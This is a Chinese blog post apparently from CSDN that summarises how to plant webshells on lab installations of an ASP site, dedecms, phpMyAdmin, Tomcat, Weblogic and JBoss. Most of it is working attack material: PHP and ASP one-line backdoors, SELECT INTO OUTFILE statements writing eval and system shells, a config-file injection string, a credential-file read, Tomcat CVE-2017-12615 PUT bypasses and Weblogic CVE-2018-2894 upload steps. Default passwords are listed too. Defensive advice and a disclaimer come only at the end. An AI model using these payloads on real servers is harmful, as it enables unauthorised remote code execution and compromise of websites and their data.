webshell获取总结（cms获取方法、非cms获取方法、中间件拿Webshell方法）

标签：Webshell http -- cms 方法 获取 php 上传

目录

前期准备：

1、cookices靶场网站搭建：

 2、dedecms靶场环境搭建：

获取Webshell方法总结：

一、CMS获取Webshell方法

 二、非CMS获取Webshell方法

1、数据库备份获取Webshell

例如：

2、抓包上传获取Webshell

3、Sql命令获取Webshell

例如：

4、模板修改获取Webshell

例如：

5、插入一句话获取Webshell

例如：

6、修改上传类型获取Webshell

例如：

7、phpMyAdmin获取webshell

三、其它获取Webshell方法

中间件拿Webshell方法：

1、Tomcat获取Webshell

2、Weblogic获取Webshell

3、JBoss获取Webshell

 四、合法的安全实践与防御措施：

正确使用CMS的建议：

合法途径与安全建议：

---

前期准备：

1、cookices靶场网站搭建：

iis新建网站：

权限配置：

IUSR用户设置所有权限： 

属性--设置父路径：

管理员登录网站：

账户：admin  admin

http://10.0.0.101:82/admin/Login.asp

---

 2、dedecms靶场环境搭建：

http://10.0.0.101:90/dedecms/install/

打开phpstudy配置文件， iregister_globalsg改为off，重启phpstudy生效：

刷新页面： 

 登录后台：

http://10.0.0.101:90/dedecms/dede/

 完成。

---

获取Webshell方法总结：

一、CMS获取Webshell方法

主要通过百度搜索CMS网站程序名称。        

如:phpcms拿Webshell、WordPress后台拿Webshell等

---

 二、非CMS获取Webshell方法

1、数据库备份获取Webshell

例如：

cookices靶场后台：在首页--企业信息--企业简介含文件上传：

上传文件进行上传照片马：

木马文件被后台重命名jpg文件 ：

照片地址
http://10.0.0.101:82/UploadFiles/2024612172324797.jpg

找到【系统管理-数据库备份】把原来上传的照片马重命名备份： 

 备份的照片马物理路径调整为链接进行阅览器访问：

http://10.0.0.101:82/admin/Databackup/123.asa

照片马成功执行： 

菜刀远程访问： 

http://10.0.0.101:82/admin/Databackup/123.asa

Skull.

---

2、抓包上传获取Webshell

3、Sql命令获取Webshell

例如：

dedecms靶场后台--系统--SQL命令行工具：

 插入一句话语句写入到站点目录：

Select '<?php eval($_POST[chopper]);?>' into outfile 'c:/phpstudy/www/eval.php';

 前提：MySQL配置文件secure_file_priv="" 为空

 

 成功上传根目录：

 菜刀远程访问：

http://10.0.0.101:90/eval.php

chopper

成功连接访问：

---

4、模板修改获取Webshell

例如：

 dedecms靶场后台：模板--标签源码管理--编辑php文件：

为php代码修改为php一句话木马：： 

 

 根据文件存放目录访问木马文件：

菜刀远程连接：

http://10.0.0.101:90/dedecms/include/taglib/adminname.lib.php

chopper

 成功访问：

5、插入一句话获取Webshell

例如：

cookices靶场后台：【站点-系统管理-网站配置】与网站配置文件【Config.asp】显示内容一致：

说明：修改站点网站配置内容会直接保存在Config.asp文件里，根据这一特性编辑一句话木马语句插入到网站配置里

 一句话木马：（先用"%>进行闭合前面内容）

"%><%eval request("Skull.")%><%'" 

 访问一句话木马

http://10.0.0.101:82/inc/config.asp

菜刀远程连接：

 

6、修改上传类型获取Webshell

例如：

 dedecms靶场后台：核心--附件管理--文件式管理器--点击文件上传：

上传php木马： 

 上传成功，点击访问：

成功执行： 

---

7、phpMyAdmin获取webshell

web方式mysql管理工具phpMyAdmin

http://10.0.0.101:90/phpmyadmin/

默认账户：root

默认密码：root

 

 点击SQL输入sql语句插入一句话木马：

方法一： 

CREATE TABLE `mysql`.`best` (`best1` TEXT NOT NULL );
INSERT INTO `mysql`.`best` (`best1` ) VALUES ('<?php @eval($_POST[pass]);?>');
use mysql;
SELECT `best1` FROM `best` INTO OUTFILE 'c:\\phpStudy\\WWW\\best111111.php';
DROP TABLE IF EXISTS `best`;

方法二： 

Create TABLE oldboy (best text NOT NULL);
Insert INTO oldboy (best) VALUES('<?php @eval($_POST[pass]);?>');
select best from oldboy into outfile 'C:\\php\\htdocs\\best111111.php';
Drop TABLE IF EXISTS oldboy;

方法三：

select '<?php @eval($_POST[pass]);?>' INTO OUTFILE 'C:\\php\\htdocs\\best111111.php';

 或

select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'C:/php/htdocs/best111111.php';

读取文件内容 

select load_file(‘c://windows//system32//inetsrv//MetaBase.xml');
c:/windows/system32/inetsrv/MetaBase.xml

---

三、其它获取Webshell方法

中间件拿Webshell方法：

1、Tomcat获取Webshell

Tomcat文件上传漏洞：

CVE-2017-12615

CVE-2020-1938

弱口令&war远程部署

参考链接：

干货｜最全的Tomcat漏洞复现笔记

CVE-2017-12615漏洞：

CVE-2017-12615对应的漏洞为任意文件写入，主要影响的是Tomcat的7.0.0-7.0.81这几个版本

Tomcat-漏洞原理

由于配置不当（非默认配置），将配置文件conf/web.xml中的readonly设置为了 false，导致可以使用PUT方法上传任意文件，但限制了jsp后缀的上传

根据描述，在 Windows 服务器下，将 readonly 参数设置为 false 时，即可通过 PUT 方式创建一个 JSP 文件，并可以执行任意代码

通过阅读 conf/web.xml 文件，可以发现，默认 readonly 为 true，当 readonly 设置为 false 时，可以通过 PUT / DELETE 进行文件操控。

这里就需要进行绕过，这里绕过有三种方法：

1.Windows下不允许文件以空格结尾（限于Windows下）
以PUT /a001.jsp%20 HTTP/1.1上传到 Windows会被自动去掉末尾空格

2.Windows NTFS流（限于Windows下）
Put/a001.jsp::$DATA HTTP/1.1

3. /在文件名中是非法的，也会被去除（Linux/Windows）
Put/a001.jsp/http:/1.1

---

2、Weblogic获取Webshell

任意文件上传漏洞操作（CVE-2018-2894）

未授权访问路径:（未登录）

http://10.0.0.101:7001/ws_utc/config.do

​

 修改当前的工作目录

 默认为：

C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain\tmp\WSTestPageWorkDir

修改为： 

C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\wstestclient\i7n5e1\war\css

​

 修改目录之后，点击安全--添加--输入账号密码---选择木马文件--bp抓包--提交上传​

 获取响应包：

​

上传成功：

​

访问上传的木马文件：

访问连接修改抓包获取的id和文件名（1715849377709_muma.jsp）

http://10.0.0.101:7001/ws_utc/css/config/keystore/1715849377709_muma.jsp

 木马文件成功访问执行：

​

由此可以使用webshell工具远程控制。

---

3、JBoss获取Webshell

 如：访问上传的【jobfan.war压缩包】里的no.jsp文件（jobfan.war压缩包含木马文件）

​

​

 阅览器访问：

（ jboss访问：压缩包名+文件名）

http://10.0.0.101:7777/jobfan/no.jsp

​

 可以执行操作相关命令：​

---

四、合法的安全实践和防御措施总结：

1. 安全培训：提升团队对网络安全威胁的意识，包括Webshell的危害和防御策略。
2. 代码审计：定期审查网站代码，查找并修复潜在的安全漏洞，如注入、跨站脚本(XSS)、文件包含等。
3. 权限控制：严格限制服务器和应用程序的访问权限，遵循最小权限原则。
4. 安全配置：正确配置Web服务器、数据库和应用程序框架，禁用不必要的功能和服务。
5. 输入验证与过滤：对所有用户输入进行严格的验证和过滤，避免恶意数据执行。
6. 安全更新：定期更新CMS、插件、主题及所有依赖组件，修补已知安全漏洞。
7. 防火墙与IDS：部署Web应用防火墙和入侵检测系统，监测并阻止可疑请求。
8. 日志监控：定期审查系统和应用日志，及时发现并响应异常活动。
9. 备份与恢复计划：制定数据备份策略，确保在遭受攻击时能够迅速恢复。

请始终遵循合法合规的途径，保护网络安全，维护数据隐私，共同营造健康的网络环境。

合法途径与安全建议：

1. 安全审计与渗透测试：

   • 对网站进行定期的安全审计和渗透测试，但需确保在合法授权下进行，旨在发现并修复安全漏洞，而非恶意利用。

2. 教育与培训：

   • 加强团队对网络安全知识的学习，了解常见的攻击手段如SQL注入、文件上传漏洞等，并掌握防范措施。

3. 强化防护措施：

   • 配置服务器以限制不必要的文件执行权限，启用防火墙规则，定期更新系统及应用程序补丁。

4. 代码审查与安全开发：

   • 实施严格的代码审查流程，采用安全编码实践，如对用户输入进行过滤和验证，使用预编译语句预防SQL注入等。

5. 应急响应计划：

   • 制定详细的网络安全事件应急响应计划，以便在发生安全事件时迅速有效地应对。

---

声明：

• 此文章只做技术研究，谨遵守国家相关法律法规，请勿用于违法用途，如果您对文章内容有疑问，可以尝试留言私信，如有侵权请联系小编处理。
• 请始终遵循合法合规的安全操作，维护网络安全环境，保护用户数据安全。

标签：Webshell,http,--,cms,方法,获取,php,上传
From： https://blog.csdn.net/qq_42321190/article/details/139629476